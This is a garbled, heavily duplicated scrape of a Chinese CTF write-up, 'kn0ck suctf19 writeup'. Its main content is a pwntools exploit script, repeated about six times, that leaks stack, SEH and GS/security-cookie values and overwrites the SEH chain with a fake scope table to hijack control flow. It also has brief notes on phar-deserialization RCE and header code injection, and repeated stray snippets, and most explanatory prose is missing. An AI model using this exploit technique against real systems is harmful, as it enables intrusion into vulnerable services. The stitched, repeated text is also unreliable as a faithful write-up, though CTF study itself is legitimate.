from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



kn0ck suctf19 writeup - 安全客,安全资讯平台

0x03 Pythonginx




from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 




from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 




from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 


from pwn import * import string t = remote('', 6666) #t = remote('', 9999)  def calc_esi(ret_addr):     ret_addr = hex(ret_addr)[2:].zfill(8)     esi = ''     for i in ret_addr:         if i in '1234567890':             esi+=chr(ord(i)+3)         elif i in string.ascii_letters:             esi+=chr(ord(i)+55)     return esi #通过第一阶段验证 print t.recvuntil('stack address = ') stack_addr = t.recvline()[2:-2] print stack_addr stack_addr = int(stack_addr,16) print t.recvuntil('main address = ') main_addr = t.recvline()[2:-2] print main_addr main_addr_num = int(main_addr,16) ret_addr = main_addr_num+0x4be3 esi = calc_esi(ret_addr) print 'esi= ',esi #esi = hex(ret_addr)[2:].zfill(8) t.sendline(esi)  #泄露seh_next print t.recvuntil('to know more?') t.sendline('yes') print t.recvuntil('do you want to know?') seh_next_addr = stack_addr-(0x19ff10-0x19fee0) print 'seh_next_addr: ',hex(seh_next_addr) t.sendline(str(seh_next_addr)) print t.recvuntil('value is 0x') seh_next = t.recvuntil('rn')[:-2] print 'seh_next: ',seh_next seh_next = int(seh_next,16)  #泄露seh_next后面的seh_handler print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') handler_addr = stack_addr-(0x19ff10-0x19fee4) print 'handler: ',hex(handler_addr) t.sendline(str(handler_addr)) print t.recvuntil('value is 0x') handler = t.recvuntil('rn')[:-2] print 'handler: ',handler handler = int(handler,16)  #泄露栈上面的gscookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') cookie = stack_addr-(0x19ff10-0x19fed4) print 'cookie addr: ',hex(cookie) t.sendline(str(cookie)) print t.recvuntil('value is 0x') cookie = t.recvuntil('rn')[:-2] print 'cookie: ',cookie cookie = int(cookie,16)  #泄露security cookie print t.recvuntil('to know more?rn') t.sendline('yes') print t.recvuntil('do you want to know?rn') sc = 0x47C004-0x40395e+ main_addr_num print 'sc addr: ',hex(sc) t.sendline(str(sc)) print t.recvuntil('value is ') sc = t.recvuntil('rn')[2:-2]  print 'sc: ',sc sc = int(sc,16)   #计算ebp ebp = stack_addr-(0x19ff10-0x19fef0) print 'ebp: ',hex(ebp)  #计算buf地址,计算scope指针 buf_addr = stack_addr-(0x19FF10-0x019FE44) print 'buf_addr:', hex(buf_addr) scope_addr = (buf_addr+4)^sc print 'scope_addr: ',hex(scope_addr) print t.recvuntil('to know more?rn') t.sendline('1')  ''' payload  '''  getflag_addr = main_addr_num+0x0408266-0x40395E#计算getflag地址 payload = 'aaaa' #把fake scope放在后4字节是因为之后会输入yes破坏前4字节 payload += 'xE4xFFxFFxFFx00x00x00x00x0CxFFxFFxFFx00x00x00x00xFExFFxFFxFF'+p32(getflag_addr)*2 #padding payload +='x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x31x31x31x00x32x31x32x00x00x00x00x00x00x00x00x00' payload +=p32(cookie)+'3'*8+p32(seh_next)+p32(handler)+p32(scope_addr)+p32(0)+p32(ebp)   print(len(payload)) t.sendline(payload)    print t.recvuntil('you want to know more?rn') t.sendline('yes') print t.recvuntil('n') t.sendline('111')#再次触发异常,进入getflag代码 print t.interactive() 



The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 


kn0ck suctf19 writeup - 安全客,安全资讯平台


0x04 easy_sql




The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 




The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 


The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 


The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 



The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 



0x05 Upload labs 2


去看看你自己到底传了个啥 交flag时去掉引号



The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 



The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 




The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 



The malloc_usable_size() function returns the number of usable bytes in the block pointed to by ptr, a pointer        to a block of memory allocated by malloc(3) or a related function. 



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



zsx师傅曾在他的文章《Phar与Stream Wrapper造成PHP RCE的深入挖掘》写到,只要函数在底层调用了这个php_stream_locate_url_wrapper函数,那么就能触发phar反序列化,而finfo_open函数在底层恰好就是使用了这个函数。(其实这个点本地盲打也能触发,所以发现的话也不难)


kn0ck suctf19 writeup - 安全客,安全资讯平台


for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



kn0ck suctf19 writeup - 安全客,安全资讯平台

0x06 Cocktail’s Remix




发现回显的是 It Works!



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 




kn0ck suctf19 writeup - 安全客,安全资讯平台



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 



所以尝试进行下载 /usr/lib/apache2/modules/

先用file命令看了一下,发现是64位程序,所以使用IDA Pro直接来进行分析

kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


kn0ck suctf19 writeup - 安全客,安全资讯平台


for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 


kn0ck suctf19 writeup - 安全客,安全资讯平台

for ( i = 0; i <= 6; ++i )   buf[i] = ((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) | i) & ~((buf[i] | buf[i + 1]) & ~(buf[i] & buf[i + 1]) & i) //buf = "Qf(>qwd!" 


kn0ck suctf19 writeup - 安全客,安全资讯平台

buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 


kn0ck suctf19 writeup - 安全客,安全资讯平台

0x07 Game


How fast can you play?




buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 



buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 




kn0ck suctf19 writeup - 安全客,安全资讯平台

buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 



buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 



kn0ck suctf19 writeup - 安全客,安全资讯平台

buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 



kn0ck suctf19 writeup - 安全客,安全资讯平台

0x08 iCloudMusic-WriteUp




buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 




kn0ck suctf19 writeup - 安全客,安全资讯平台


buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 


根据以上内容, 大胆猜测,小心求证。尝试对header进行注入(可以本地先尝试js_to_run代码注入后是否可以运行,然后再打远程)。


buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 



buf = '!' final_buf = "Qf(>qwd!" for _ in range(7):     cur = ord(buf[0])     i = 6 - _     for pre in range(256):         if ord(final_buf[i]) == ((pre | cur) & ~(pre & cur) | i) & ~((pre | cur) & ~(pre & cur) & i):             buf = chr(pre) + buf             continue  print buf # e4SyD1C! 








# from PwnContext import *  if __name__ == '__main__':             context.terminal = ['tmux', 'splitw', '-h']     #context.log_level = 'debug'     # functions for quick script     s       = lambda data               :ctx.send(str(data))        #in case that data is an int     sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data))      sl      = lambda data               :ctx.sendline(str(data))      sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data))      r       = lambda numb=4096          :ctx.recv(numb)     ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)     irt     = lambda                    :ctx.interactive()     rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)     dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)     # misc functions     uu32    = lambda data   :u32(data.ljust(4, ''))     uu64    = lambda data   :u64(data.ljust(8, ''))      ctx.binary = './pwn'     ctx.remote = ('', 10001)     #ctx.custom_lib_dir = 